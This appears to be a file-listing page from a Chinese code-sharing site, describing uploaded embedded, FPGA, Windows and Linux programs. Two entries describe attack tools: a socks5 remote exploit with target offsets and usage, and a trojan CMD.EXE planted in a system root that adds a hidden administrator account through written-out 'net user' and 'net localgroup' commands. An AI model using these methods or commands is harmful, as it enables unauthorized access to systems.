On the LPC13xx, programming, erasure and re-programming of the on-chip flash can be performed using In-System Programming (ISP) via the UART serial port, and also, can be performed using In-Application Programming (IAP) calls directed by the end-user code. For In-System Programming (ISP) via the UART serial port, the ISP command handler (resides in the bootloader) allows erasure of one or more sector (s) of the on-chip flash memory.
標簽: 1300 LPC 勘誤 數(shù)據(jù)手冊
上傳時間: 2013-12-13
上傳用戶:lmq0059
Nios II軟件構建工具入門 The Nios® II Software Build Tools (SBT) allows you to construct a wide variety of complex embedded software systems using a command-line interface. From this interface, you can execute Software Built Tools command utilities, and use scripts other tools) to combine the command utilities in many useful ways. This chapter introduces you to project creation with the SBT at the command line This chapter includes the following sections: ■ “Advantages of Command-Line Software Development” ■ “Outline of the Nios II SBT Command-Line Interface” ■ “Getting Started in the SBT Command Line” ■ “Software Build Tools Scripting Basics” on page 3–8
上傳時間: 2013-11-15
上傳用戶:nanxia
The Virtex™-4 user access register (USR_ACCESS_VIRTEX4) is a 32-bit register thatprovides direct access to bitstream data by the FPGA fabric. It is useful for loadingPowerPC™ 405 (PPC405) processor caches and/or other data into the FPGA after the FPGAhas been configured, thus achieving partial reconfiguration. The USR_ACCESS_VIRTEX4register is programmed through the bitstream with a command that writes a series of 32-bitwords.
標簽: USR_ACCESS PowerPC XAPP 719
上傳時間: 2013-12-23
上傳用戶:yuanwenjiao
在 Windows 的資源管理器窗口中,我們見過 WinZIP,WinRAR 等軟件能在文件或文件夾的默認快捷菜單中添加幾個菜單項,它可以使用戶無須進入軟件內(nèi)部而直接在視窗中進行壓縮/解壓操作,十分方便用戶操作,這無疑是一個較好的應用模型,它就是我們所說的Shell擴展技術。此源代碼將以一個普通的源代碼統(tǒng)計程序為例來說明怎樣實現(xiàn)Shell擴展技術。
上傳時間: 2014-11-23
上傳用戶:zhangliming420
a Java program that reads a file containing instructions written in self-defined file (TPL in this case), and executes those instructions. This program should take the name of the TPL file as a command line parameter, and write its output to the console.
標簽: file instructions self-defined containing
上傳時間: 2015-01-11
上傳用戶:曹云鵬
socks5 remote exploit/ linux x86易受到的攻擊 linux:* socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0* socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0* socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0* socks5-v1.0r10 (compiled on a redhat 6.0) => 400* socks5-s5watch-1.0r9-2 (redhat-contrib) => no?* socks5-0.17-1 (redhat 4.2) => no* socks5-1.0r10-5 (redhat-contrib) => no??* socks5-server-1.0r6-8TL (TurboContrib) => no??用法:* $ ./1080r [offset]該代碼本人是本人千辛萬苦利用俄漢翻譯軟件從俄羅斯網(wǎng)站上找到的,還沒有來得及實用,就發(fā)上來,與大家共研。有問題請Email:jzzq8081@sina.com
標簽: linux turbolinux compiled exploit
上傳時間: 2013-12-17
上傳用戶:xuanchangri
你是不是經(jīng)常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執(zhí)行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執(zhí)行命令, 也是首先在系統(tǒng)盤的根目錄里進行查找. 這個漏洞其實是已經(jīng)是公開的秘密了. 既然現(xiàn)在作為漏洞公布出來, 我也就把網(wǎng)上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執(zhí)行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標機器的系統(tǒng)盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權限, 同時Asp/fp30reg.dll等遠程溢出出來的Shell, 一般都只有匿名權限, 但是它具有寫根目錄的權限 這個時候, 就可以把本程序放到目標機器的系統(tǒng)盤根目錄 只要等管理員在機器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統(tǒng)執(zhí)行后, 會先產(chǎn)生一個線程來做一些處理 然后用system()函數(shù)調(diào)用cmd.exe來讓用戶能夠執(zhí)行命令. 產(chǎn)生出來的線程會產(chǎn)生兩個進程序執(zhí)行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統(tǒng)上增加了一個超級
上傳時間: 2015-01-12
上傳用戶:qlpqlq
磁盤格式化是計算機用戶經(jīng)常使用的操作之一,但是對于如何編程實現(xiàn)磁盤格式化,很多人卻不清楚。很多人認為磁盤格式化應該需要編寫負載的VXD或者WDM驅(qū)動程序來直接對硬件進行操作。世界上完全可以通過調(diào)用一個簡單的Shell函數(shù)來實現(xiàn)這一功能。
上傳時間: 2013-12-31
上傳用戶:mpquest
RemoteWAP is a Remote Administration Tool for any Operating System that can support the Java Virtual Machine. It has been designed for anyone who wishes to have complete control of there OS anywhere by using a WAP enabled Mobile Phone. RemoteWAP is developed using Java and WML for the client mobile phone front-end pages. RemoteWAP has a Java Swing-GUI to allow for easy control. Future releases will have a Command Line Interface for quick use
標簽: Administration RemoteWAP Operating Virtual
上傳時間: 2015-02-01
上傳用戶:exxxds
應用平臺 Unix/Linux <br> sct(Serial Communication Tracer的縮寫)是一個很有用的Linux/Unix串行通信調(diào)試工具,軟件內(nèi)置了Shell命令解釋器,你可以通過直接輸入簡短的命令和參數(shù)來控制串口的打開/關閉和進行各種發(fā)送/接收活動。
標簽: Linux Unix Communication Serial
上傳時間: 2013-12-19
上傳用戶:plsee